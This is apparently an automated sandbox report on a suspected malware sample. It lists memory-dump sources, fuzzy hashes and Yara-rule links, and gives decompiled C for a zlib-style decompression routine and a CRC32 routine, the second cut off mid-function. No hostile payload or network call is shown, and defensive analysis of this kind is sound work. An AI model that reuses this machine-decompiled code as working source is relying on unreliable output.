                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                  • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                                  • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                  • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00499CE8, Relevance: .5, Instructions: 545COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 57cea1087178a027df661a175fac6de2f75dd9b69ed71e8bfbf4443305ce0d56
                                                                                                                                                  • Instruction ID: 1b27d16218b1608bfa42f9f5659729a3803b267bd73bea66be62e415390e8a78
                                                                                                                                                  • Opcode Fuzzy Hash: 57cea1087178a027df661a175fac6de2f75dd9b69ed71e8bfbf4443305ce0d56
                                                                                                                                                  • Instruction Fuzzy Hash: 1342E871D10B598EDB11EF68C851AD9F7B1EF99300F10C69AE4586B221FB70AAC4CF81
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00406CA0, Relevance: .4, Instructions: 401COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406CA0() {
				intOrPtr _t153;
				unsigned int _t157;
				unsigned int _t160;
				intOrPtr _t172;
				signed int _t174;
				signed char _t180;
				signed int _t181;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				intOrPtr _t190;
				unsigned int _t192;
				char _t198;
				char _t199;
				char _t202;
				unsigned int _t217;
				intOrPtr* _t221;
				intOrPtr _t222;
				signed char _t230;
				intOrPtr* _t232;
				signed char _t237;
				unsigned int _t245;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				signed char _t263;
				signed char _t269;
				signed int _t280;
				signed int _t284;
				intOrPtr _t285;
				signed char _t288;
				signed char _t290;
				unsigned int _t297;
				char _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t318;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				char* _t331;
				char* _t333;
				char* _t334;
				char* _t335;
				signed char* _t337;
				void* _t341;
				unsigned int _t342;
				void* _t345;
				void* _t346;
				intOrPtr _t347;
				signed char* _t348;
				void* _t349;

				_t221 =  *((intOrPtr*)(_t349 + 0x50));
				_t153 =  *((intOrPtr*)(_t221 + 0x1c));
				_t217 =  *(_t153 + 0x38);
				_t337 =  *_t221 - 1;
				 *((intOrPtr*)(_t349 + 0x14)) =  *((intOrPtr*)(_t221 + 4)) + _t337 - 5;
				_t222 =  *((intOrPtr*)(_t221 + 0x10));
				_t331 =  *((intOrPtr*)(_t221 + 0xc)) - 1;
				 *((intOrPtr*)(_t349 + 0x38)) = _t222 -  *(_t349 + 0x54) + _t331;
				 *((intOrPtr*)(_t349 + 0x2c)) = _t222 + _t331 - 0x101;
				 *((intOrPtr*)(_t349 + 0x28)) =  *((intOrPtr*)(_t153 + 0x28));
				 *((intOrPtr*)(_t349 + 0x3c)) =  *((intOrPtr*)(_t153 + 0x2c));
				 *((intOrPtr*)(_t349 + 0x44)) =  *((intOrPtr*)(_t153 + 0x30));
				 *((intOrPtr*)(_t349 + 0x40)) =  *((intOrPtr*)(_t153 + 0x34));
				 *((intOrPtr*)(_t349 + 0x20)) =  *((intOrPtr*)(_t153 + 0x4c));
				 *((intOrPtr*)(_t349 + 0x24)) =  *((intOrPtr*)(_t153 + 0x50));
				 *((intOrPtr*)(_t349 + 0x18)) = _t153;
				_t326 =  *(_t153 + 0x3c);
				 *(_t349 + 0x54) = 1;
				_t280 = (1 <<  *(_t153 + 0x54)) - 1;
				 *(_t349 + 0x10) = _t337;
				 *(_t349 + 0x48) = 1;
				 *(_t349 + 0x30) = ( *(_t349 + 0x54) <<  *(_t153 + 0x58)) - 1;
				L1:
				while(1) {
					if(_t326 < 0xf) {
						_t174 = (_t337[1] & 0x000000ff) << _t326;
						_t337 =  &(_t337[2]);
						_t329 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + _t174 + (( *_t337 & 0x000000ff) << _t329);
						_t326 = _t329 + 8;
					}
					_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + (_t280 & _t217) * 4);
					_t230 = _t157 >> 0x00000008 & 0x000000ff;
					_t284 = _t157 & 0x000000ff;
					_t217 = _t217 >> _t230;
					_t326 = _t326 - _t230;
					if(_t284 == 0) {
						L7:
						_t331 = _t331 + 1;
						 *_t331 = _t157 >> 0x10;
						L46:
						_t285 =  *((intOrPtr*)(_t349 + 0x14));
						if(_t337 >= _t285 || _t331 >=  *((intOrPtr*)(_t349 + 0x2c))) {
							L59:
							_t160 = _t326 >> 3;
							_t338 = _t337 - _t160;
							_t327 = _t326 - _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160;
							_t232 =  *((intOrPtr*)(_t349 + 0x50));
							_t144 = _t338 + 1; // -1
							 *_t232 = _t144;
							 *((intOrPtr*)(_t232 + 0xc)) = _t331 + 1;
							 *((intOrPtr*)(_t232 + 0x10)) =  *((intOrPtr*)(_t349 + 0x2c)) - _t331 + 0x101;
							_t172 =  *((intOrPtr*)(_t349 + 0x18));
							 *((intOrPtr*)(_t232 + 4)) = _t285 - _t337 - _t160 + 5;
							 *(_t172 + 0x3c) = _t327;
							 *(_t172 + 0x38) = _t217 & (0x00000001 << _t327) - 0x00000001;
							return _t172;
						} else {
							_t280 =  *(_t349 + 0x48);
							continue;
						}
					}
					while((_t284 & 0x00000010) == 0) {
						if((_t284 & 0x00000040) != 0) {
							if((_t284 & 0x00000020) == 0) {
								L57:
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								L58:
								_t285 =  *((intOrPtr*)(_t349 + 0x14));
								goto L59;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0xb;
							goto L58;
						}
						 *(_t349 + 0x54) = 1;
						_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + ((( *(_t349 + 0x54) << _t284) - 0x00000001 & _t217) + (_t157 >> 0x10)) * 4);
						_t269 = _t157 >> 0x00000008 & 0x000000ff;
						_t284 = _t157 & 0x000000ff;
						_t217 = _t217 >> _t269;
						_t326 = _t326 - _t269;
						if(_t284 != 0) {
							continue;
						}
						goto L7;
					}
					_t288 = _t284 & 0x0000000f;
					 *(_t349 + 0x54) = _t157 >> 0x10;
					if(_t288 != 0) {
						_t263 = _t288;
						 *(_t349 + 0x54) =  *(_t349 + 0x54) + ((0x00000001 << _t263) - 0x00000001 & _t217);
						_t217 = _t217 >> _t263;
						_t326 = _t326 - _t288;
					}
					if(_t326 < 0xf) {
						_t318 = _t337[1] & 0x000000ff;
						_t348 =  &(_t337[1]);
						_t337 =  &(_t348[1]);
						_t328 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + (_t318 << _t326) + ((_t348[1] & 0x000000ff) << _t328);
						_t326 = _t328 + 8;
					}
					_t290 =  *( *((intOrPtr*)(_t349 + 0x24)) + ( *(_t349 + 0x30) & _t217) * 4);
					_t237 = _t290 >> 0x00000008 & 0x000000ff;
					_t180 = _t290 & 0x000000ff;
					_t217 = _t217 >> _t237;
					_t326 = _t326 - _t237;
					 *(_t349 + 0x1c) = _t290;
					if((_t180 & 0x00000010) != 0) {
						L17:
						_t181 = _t180 & 0x0000000f;
						 *(_t349 + 0x1c) = _t290 >> 0x10;
						if(_t326 < _t181) {
							_t309 = _t337[1] & 0x000000ff;
							_t337 =  &(_t337[1]);
							_t310 = _t309 << _t326;
							_t326 = _t326 + 8;
							 *(_t349 + 0x10) = _t337;
							_t217 = _t217 + _t310;
							if(_t326 < _t181) {
								_t311 = _t337[1] & 0x000000ff;
								_t337 =  &(_t337[1]);
								 *(_t349 + 0x10) = _t337;
								_t217 = _t217 + (_t311 << _t326);
								_t326 = _t326 + 8;
							}
						}
						_t326 = _t326 - _t181;
						_t297 =  *(_t349 + 0x1c) + ((0x00000001 << _t181) - 0x00000001 & _t217);
						_t183 = _t331 -  *((intOrPtr*)(_t349 + 0x38));
						_t217 = _t217 >> _t181;
						 *(_t349 + 0x1c) = _t297;
						if(_t297 <= _t183) {
							_t185 = _t331 - _t297;
							do {
								_t186 = _t185 + 1;
								 *((char*)(_t331 + 1)) =  *(_t185 + 1) & 0x000000ff;
								_t187 = _t186 + 1;
								_t333 = _t331 + 2;
								 *_t333 =  *((intOrPtr*)(_t186 + 1));
								_t185 = _t187 + 1;
								_t331 = _t333 + 1;
								 *_t331 =  *(_t187 + 1) & 0x000000ff;
								_t245 =  *(_t349 + 0x54) - 3;
								 *(_t349 + 0x54) = _t245;
							} while (_t245 > 2);
							if(_t245 != 0) {
								_t188 = _t185 + 1;
								_t331 = _t331 + 1;
								 *_t331 =  *(_t185 + 1);
								if(_t245 > 1) {
									_t331 = _t331 + 1;
									 *_t331 =  *((intOrPtr*)(_t188 + 1));
								}
							}
							goto L46;
						} else {
							_t341 = _t297 - _t183;
							if(_t341 >  *((intOrPtr*)(_t349 + 0x3c))) {
								_t337 =  *(_t349 + 0x10);
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								goto L58;
							}
							_t190 =  *((intOrPtr*)(_t349 + 0x44));
							_t248 =  *((intOrPtr*)(_t349 + 0x40)) - 1;
							 *((intOrPtr*)(_t349 + 0x34)) = _t248;
							if(_t190 != 0) {
								if(_t190 >= _t341) {
									_t249 = _t248 + _t190 - _t341;
									if(_t341 >=  *(_t349 + 0x54)) {
										L39:
										_t192 =  *(_t349 + 0x54);
										if(_t192 <= 2) {
											L42:
											_t342 =  *(_t349 + 0x54);
											if(_t342 != 0) {
												_t250 = _t249 + 1;
												_t331 = _t331 + 1;
												 *_t331 =  *(_t249 + 1);
												if(_t342 > 1) {
													_t331 = _t331 + 1;
													 *_t331 =  *((intOrPtr*)(_t250 + 1));
												}
											}
											_t337 =  *(_t349 + 0x10);
											goto L46;
										}
										_t107 = _t192 - 3; // -2
										_t345 = (0xaaaaaaab * _t107 >> 0x20 >> 1) + 1;
										do {
											 *(_t349 + 0x54) =  *(_t349 + 0x54) - 3;
											_t251 = _t249 + 1;
											_t334 = _t331 + 1;
											 *_t334 =  *(_t249 + 1) & 0x000000ff;
											_t252 = _t251 + 1;
											_t335 = _t334 + 1;
											 *_t335 =  *((intOrPtr*)(_t251 + 1));
											_t249 = _t252 + 1;
											_t331 = _t335 + 1;
											_t345 = _t345 - 1;
											 *_t331 =  *(_t252 + 1) & 0x000000ff;
										} while (_t345 != 0);
										goto L42;
									}
									 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
									do {
										_t198 =  *(_t249 + 1);
										_t249 = _t249 + 1;
										_t331 = _t331 + 1;
										_t341 = _t341 - 1;
										 *_t331 = _t198;
									} while (_t341 != 0);
									L38:
									_t249 = _t331 - _t297;
									goto L39;
								}
								_t346 = _t341 - _t190;
								_t249 = _t248 + _t190 - _t341 +  *((intOrPtr*)(_t349 + 0x28));
								if(_t346 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t346;
								do {
									_t308 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t346 = _t346 - 1;
									 *_t331 = _t308;
								} while (_t346 != 0);
								_t249 =  *((intOrPtr*)(_t349 + 0x34));
								if(_t190 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t190;
								_t347 = _t190;
								do {
									_t199 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t347 = _t347 - 1;
									 *_t331 = _t199;
								} while (_t347 != 0);
								_t249 = _t331 -  *(_t349 + 0x1c);
								goto L39;
							}
							_t249 = _t248 +  *((intOrPtr*)(_t349 + 0x28)) - _t341;
							if(_t341 >=  *(_t349 + 0x54)) {
								goto L39;
							}
							 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
							do {
								_t202 =  *(_t249 + 1);
								_t249 = _t249 + 1;
								_t331 = _t331 + 1;
								_t341 = _t341 - 1;
								 *_t331 = _t202;
							} while (_t341 != 0);
							goto L38;
						}
					} else {
						while((_t180 & 0x00000040) == 0) {
							_t290 =  *( *((intOrPtr*)(_t349 + 0x24)) + (((0x00000001 << _t180) - 0x00000001 & _t217) + ( *(_t349 + 0x1e) & 0x0000ffff)) * 4);
							_t180 = _t290 & 0x000000ff;
							_t217 = _t217 >> 0xad;
							_t326 = _t326 - 0xad;
							 *(_t349 + 0x1c) = 1;
							if((_t180 & 0x00000010) == 0) {
								continue;
							}
							goto L17;
						}
						goto L57;
					}
				}
			}





























































                                                                                                                                                  0x00406ca7
                                                                                                                                                  0x00406cab
                                                                                                                                                  0x00406cb1
                                                                                                                                                  0x00406cb6
                                                                                                                                                  0x00406cbb
                                                                                                                                                  0x00406cc2
                                                                                                                                                  0x00406ccb
                                                                                                                                                  0x00406cd5
                                                                                                                                                  0x00406cdc
                                                                                                                                                  0x00406ce3
                                                                                                                                                  0x00406cea
                                                                                                                                                  0x00406cf1
                                                                                                                                                  0x00406cf8
                                                                                                                                                  0x00406cff
                                                                                                                                                  0x00406d03
                                                                                                                                                  0x00406d14
                                                                                                                                                  0x00406d18
                                                                                                                                                  0x00406d1b
                                                                                                                                                  0x00406d29
                                                                                                                                                  0x00406d2a
                                                                                                                                                  0x00406d2e
                                                                                                                                                  0x00406d33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406d37
                                                                                                                                                  0x00406d3a
                                                                                                                                                  0x00406d43
                                                                                                                                                  0x00406d45
                                                                                                                                                  0x00406d46
                                                                                                                                                  0x00406d53
                                                                                                                                                  0x00406d57
                                                                                                                                                  0x00406d59
                                                                                                                                                  0x00406d59
                                                                                                                                                  0x00406d62
                                                                                                                                                  0x00406d6a
                                                                                                                                                  0x00406d6d
                                                                                                                                                  0x00406d70
                                                                                                                                                  0x00406d72
                                                                                                                                                  0x00406d76
                                                                                                                                                  0x00406db9
                                                                                                                                                  0x00406db9
                                                                                                                                                  0x00406dbd
                                                                                                                                                  0x00406fef
                                                                                                                                                  0x00406fef
                                                                                                                                                  0x00406ff5
                                                                                                                                                  0x00407097
                                                                                                                                                  0x00407099
                                                                                                                                                  0x0040709c
                                                                                                                                                  0x004070a4
                                                                                                                                                  0x004070af
                                                                                                                                                  0x004070bb
                                                                                                                                                  0x004070be
                                                                                                                                                  0x004070c3
                                                                                                                                                  0x004070d1
                                                                                                                                                  0x004070d4
                                                                                                                                                  0x004070d8
                                                                                                                                                  0x004070db
                                                                                                                                                  0x004070e1
                                                                                                                                                  0x004070e8
                                                                                                                                                  0x00407005
                                                                                                                                                  0x00407005
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407005
                                                                                                                                                  0x00406ff5
                                                                                                                                                  0x00406d78
                                                                                                                                                  0x00406d80
                                                                                                                                                  0x00407070
                                                                                                                                                  0x0040707e
                                                                                                                                                  0x00407086
                                                                                                                                                  0x0040708d
                                                                                                                                                  0x00407093
                                                                                                                                                  0x00407093
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407093
                                                                                                                                                  0x00407076
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407076
                                                                                                                                                  0x00406d8b
                                                                                                                                                  0x00406da3
                                                                                                                                                  0x00406dab
                                                                                                                                                  0x00406dae
                                                                                                                                                  0x00406db1
                                                                                                                                                  0x00406db3
                                                                                                                                                  0x00406db7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406db7
                                                                                                                                                  0x00406dc7
                                                                                                                                                  0x00406dca
                                                                                                                                                  0x00406dce
                                                                                                                                                  0x00406de6
                                                                                                                                                  0x00406df2
                                                                                                                                                  0x00406df6
                                                                                                                                                  0x00406df8
                                                                                                                                                  0x00406df8
                                                                                                                                                  0x00406dfd
                                                                                                                                                  0x00406dff
                                                                                                                                                  0x00406e03
                                                                                                                                                  0x00406e0a
                                                                                                                                                  0x00406e0d
                                                                                                                                                  0x00406e16
                                                                                                                                                  0x00406e1a
                                                                                                                                                  0x00406e1c
                                                                                                                                                  0x00406e1c
                                                                                                                                                  0x00406e29
                                                                                                                                                  0x00406e31
                                                                                                                                                  0x00406e34
                                                                                                                                                  0x00406e37
                                                                                                                                                  0x00406e39
                                                                                                                                                  0x00406e3b
                                                                                                                                                  0x00406e41
                                                                                                                                                  0x00406e7c
                                                                                                                                                  0x00406e7f
                                                                                                                                                  0x00406e82
                                                                                                                                                  0x00406e88
                                                                                                                                                  0x00406e8a
                                                                                                                                                  0x00406e8e
                                                                                                                                                  0x00406e91
                                                                                                                                                  0x00406e93
                                                                                                                                                  0x00406e96
                                                                                                                                                  0x00406e9a
                                                                                                                                                  0x00406e9e
                                                                                                                                                  0x00406ea0
                                                                                                                                                  0x00406ea4
                                                                                                                                                  0x00406ea9
                                                                                                                                                  0x00406ead
                                                                                                                                                  0x00406eaf
                                                                                                                                                  0x00406eaf
                                                                                                                                                  0x00406e9e
                                                                                                                                                  0x00406ebd
                                                                                                                                                  0x00406ec8
                                                                                                                                                  0x00406ece
                                                                                                                                                  0x00406ed2
                                                                                                                                                  0x00406ed4
                                                                                                                                                  0x00406eda
                                                                                                                                                  0x00407010
                                                                                                                                                  0x00407012
                                                                                                                                                  0x00407016
                                                                                                                                                  0x00407017
                                                                                                                                                  0x0040701e
                                                                                                                                                  0x0040701f
                                                                                                                                                  0x00407020
                                                                                                                                                  0x00407026
                                                                                                                                                  0x00407027
                                                                                                                                                  0x00407028
                                                                                                                                                  0x0040702e
                                                                                                                                                  0x00407031
                                                                                                                                                  0x00407035
                                                                                                                                                  0x0040703c
                                                                                                                                                  0x00407041
                                                                                                                                                  0x00407042
                                                                                                                                                  0x00407043
                                                                                                                                                  0x00407048
                                                                                                                                                  0x0040704d
                                                                                                                                                  0x0040704e
                                                                                                                                                  0x0040704e
                                                                                                                                                  0x00407048
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406ee0
                                                                                                                                                  0x00406ee2
                                                                                                                                                  0x00406ee8
                                                                                                                                                  0x0040705a
                                                                                                                                                  0x0040705e
                                                                                                                                                  0x00407065
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407065
                                                                                                                                                  0x00406ef2
                                                                                                                                                  0x00406ef6
                                                                                                                                                  0x00406ef7
                                                                                                                                                  0x00406efd
                                                                                                                                                  0x00406f25
                                                                                                                                                  0x00406f76
                                                                                                                                                  0x00406f7c
                                                                                                                                                  0x00406f92
                                                                                                                                                  0x00406f92
                                                                                                                                                  0x00406f99
                                                                                                                                                  0x00406fd1
                                                                                                                                                  0x00406fd1
                                                                                                                                                  0x00406fd7
                                                                                                                                                  0x00406fdc
                                                                                                                                                  0x00406fdd
                                                                                                                                                  0x00406fde
                                                                                                                                                  0x00406fe3
                                                                                                                                                  0x00406fe8
                                                                                                                                                  0x00406fe9
                                                                                                                                                  0x00406fe9
                                                                                                                                                  0x00406fe3
                                                                                                                                                  0x00406feb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406feb
                                                                                                                                                  0x00406f9b
                                                                                                                                                  0x00406fa9
                                                                                                                                                  0x00406fb0
                                                                                                                                                  0x00406fb4
                                                                                                                                                  0x00406fb9
                                                                                                                                                  0x00406fba
                                                                                                                                                  0x00406fbb
                                                                                                                                                  0x00406fc0
                                                                                                                                                  0x00406fc1
                                                                                                                                                  0x00406fc2
                                                                                                                                                  0x00406fc8
                                                                                                                                                  0x00406fc9
                                                                                                                                                  0x00406fca
                                                                                                                                                  0x00406fcd
                                                                                                                                                  0x00406fcd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406fb0
                                                                                                                                                  0x00406f7e
                                                                                                                                                  0x00406f82
                                                                                                                                                  0x00406f82
                                                                                                                                                  0x00406f85
                                                                                                                                                  0x00406f86
                                                                                                                                                  0x00406f87
                                                                                                                                                  0x00406f8a
                                                                                                                                                  0x00406f8a
                                                                                                                                                  0x00406f8e
                                                                                                                                                  0x00406f90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f90
                                                                                                                                                  0x00406f2f
                                                                                                                                                  0x00406f31
                                                                                                                                                  0x00406f37
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f39
                                                                                                                                                  0x00406f40
                                                                                                                                                  0x00406f40
                                                                                                                                                  0x00406f43
                                                                                                                                                  0x00406f44
                                                                                                                                                  0x00406f45
                                                                                                                                                  0x00406f48
                                                                                                                                                  0x00406f48
                                                                                                                                                  0x00406f4c
                                                                                                                                                  0x00406f54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f56
                                                                                                                                                  0x00406f5a
                                                                                                                                                  0x00406f60
                                                                                                                                                  0x00406f60
                                                                                                                                                  0x00406f63
                                                                                                                                                  0x00406f64
                                                                                                                                                  0x00406f65
                                                                                                                                                  0x00406f68
                                                                                                                                                  0x00406f68
                                                                                                                                                  0x00406f6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f6e
                                                                                                                                                  0x00406f05
                                                                                                                                                  0x00406f0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f11
                                                                                                                                                  0x00406f15
                                                                                                                                                  0x00406f15
                                                                                                                                                  0x00406f18
                                                                                                                                                  0x00406f19
                                                                                                                                                  0x00406f1a
                                                                                                                                                  0x00406f1d
                                                                                                                                                  0x00406f1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f21
                                                                                                                                                  0x00406e43
                                                                                                                                                  0x00406e43
                                                                                                                                                  0x00406e62
                                                                                                                                                  0x00406e6d
                                                                                                                                                  0x00406e70
                                                                                                                                                  0x00406e72
                                                                                                                                                  0x00406e74
                                                                                                                                                  0x00406e7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406e7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406e43
                                                                                                                                                  0x00406e41

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                  • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                                  • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                  • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0081A8C8, Relevance: .4, Instructions: 400COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6d5f129f0dd29b66f3e582392c7f90e6366e8918a850fcb3802029cadb3feff5
                                                                                                                                                  • Instruction ID: d03d180bd5f23d9546cacd939a07ae7780788d05d6575330a8770e6224122c2e
                                                                                                                                                  • Opcode Fuzzy Hash: 6d5f129f0dd29b66f3e582392c7f90e6366e8918a850fcb3802029cadb3feff5
                                                                                                                                                  • Instruction Fuzzy Hash: 6EE12831B051648FCB08DB78D494AADBBB6FF85314F1580AAD055DB3A2DB34DC85CBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00402B90, Relevance: .2, Instructions: 212COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00402B90(unsigned int __eax, signed char __ecx, unsigned int __edx) {
				signed int* _t89;
				signed char* _t90;
				signed int* _t98;
				signed int* _t100;
				signed int* _t102;
				signed int* _t103;
				signed char _t154;
				unsigned int _t164;
				signed int _t190;
				signed int _t208;
				signed int _t212;
				unsigned int _t264;
				unsigned int _t266;

				_t154 = __ecx;
				_t266 = __edx;
				_t208 =  !(((__eax & 0x0000ff00) + (__eax << 0x10) << 8) + (__eax >> 0x00000008 & 0x0000ff00) + (__eax >> 0x18));
				if(__edx != 0) {
					while((_t154 & 0x00000003) != 0) {
						_t208 = _t208 << 0x00000008 ^  *(0x41c2b0 + (_t208 >> 0x00000018 ^  *_t154 & 0x000000ff) * 4);
						_t154 = _t154 + 1;
						_t266 = _t266 - 1;
						if(_t266 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				_t89 = _t154 - 4;
				if(_t266 >= 0x20) {
					_t264 = _t266 >> 5;
					do {
						_t214 = _t208 ^ _t89[1];
						_t98 =  &(_t89[2]);
						_t172 =  *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98;
						_t100 =  &(_t98[2]);
						_t223 =  *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4);
						_t102 =  &(_t100[2]);
